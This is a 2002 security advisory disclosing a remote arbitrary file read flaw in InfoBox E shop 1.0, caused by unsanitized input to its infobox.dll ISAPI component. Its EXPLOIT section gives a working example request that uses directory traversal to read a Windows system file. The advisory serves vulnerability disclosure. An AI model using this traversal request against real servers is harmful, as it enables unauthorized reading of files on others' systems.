================================================
     == Alex Stanev Security Advisory #3 @12.14.2002 ==
     ==             http://sec.stanev.org            ==
      ================================================

PRODUCT
     E shop

VENDOR
     InfoBox [http://www.infobox.bg]

VERSIONS AFFECTED
     1.0

CLASS
     Remote arbitrary file reading

PRODUCT DESCRIPTION
     From vendor's web site:
     "Ultimate solution for eCommerce, built upon InfoBox WWW Data Base Server."

THE PROBLEM
     Base part of E shop is infobox.dll, which is Windows ISAPI. Its input is
     not sanitized and it is possible to get the contents of a regular file with
     the rights of the IIS user.

EXPLOIT
     1) Example request:
          http://example.com/scripts/infobox.dll?~get_html|new_shop\\..\\..\\..\\winnt/win.ini

PATCH/WORKAROUND
     No workaround possible. Next version?

VENDOR STATUS
     Informed. No responce received.

     =========================
    ==           EOF         ==
    == http://sec.stanev.org ==
     =========================